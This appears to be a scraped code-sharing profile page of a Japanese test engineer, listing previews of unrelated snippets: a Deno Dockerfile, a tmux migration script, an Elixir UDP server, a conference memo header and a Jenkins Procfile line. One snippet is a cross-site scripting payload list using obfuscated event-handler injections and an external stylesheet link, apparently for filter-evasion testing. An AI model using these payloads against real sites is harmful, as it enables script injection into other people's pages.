SET(Software Engineer in Test) のグループの元マネージャ。専門は ソフトウェアテスト/Lint/Git。実務経験のあるプログラミング言語は JavaScript, TypeScript, Swift, C#, Go, Isabelle, OCaml, F#(コードは OSS を参照)。
(2025/06現在)転職活動をしています。
| FROM denoland/deno:latest | |
| # Create the application directory | |
| WORKDIR /app | |
| # Copy dependency files first for caching | |
| COPY deno.json deno.lock* ./ | |
| # Copy the rest of the application code | |
| COPY . . |
| #!/usr/bin/env python | |
| # vim: set fileencoding=utf-8 | |
| # | |
| # USAGE: | |
| # Back up your tmux old config, run the script and redirect stdout to your conf | |
| # file. Example: | |
| # | |
| # $ cp ~/.tmux.conf ~/.tmux.conf.orig | |
| # $ python ./tmux-migrate-options.py ~/.tmux.conf.orig > ~/.tmux.conf | |
| # |
| # to run: | |
| # > elixir --no-halt udp_server.exs | |
| # to test: | |
| # > echo "hello world" | nc -u -w0 localhost 2052 | |
| # > echo "quit" | nc -u -w0 localhost 2052 | |
| # Let's call our module "UDPServer" | |
| defmodule UDPServer do | |
| # Our module is going to use the DSL (Domain Specific Language) for Gen(eric) Servers | |
| use GenServer |
SET(Software Engineer in Test) のグループの元マネージャ。専門は ソフトウェアテスト/Lint/Git。実務経験のあるプログラミング言語は JavaScript, TypeScript, Swift, C#, Go, Isabelle, OCaml, F#(コードは OSS を参照)。
(2025/06現在)転職活動をしています。
| 更新: | 2017-04-03 |
|---|---|
| 作者: | @voluntas |
| バージョン: | 1.0.6 |
| URL: | https://voluntas.github.io/ |
2017 年 4 月 1 日に行われた Elixir Conf Japan 2017 の発表者用のメモです。
| "onPaste="eval(';)\'SSX\'(trela'.split('').reverse().join(''))" | |
| "><link rel="stylesheet" href="http://8ant.org/asdfqwer.css"><" | |
| "onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')" | |
| "onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))" | |
| "onfocus="window['\141\154\145\162\164']('\130\123\123')" | |
| "onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))" | |
| "onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))" | |
| "onMouseUp="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')" | |
| "onMouseEnter="alert('XSS')" | |
| "onMouseDown="alert('XSS'� |
| # Only listen on http; disable ajp and https | |
| web: java -jar jenkins.war --httpPort=$PORT --ajp13Port=-1 --httpsPort=-1 |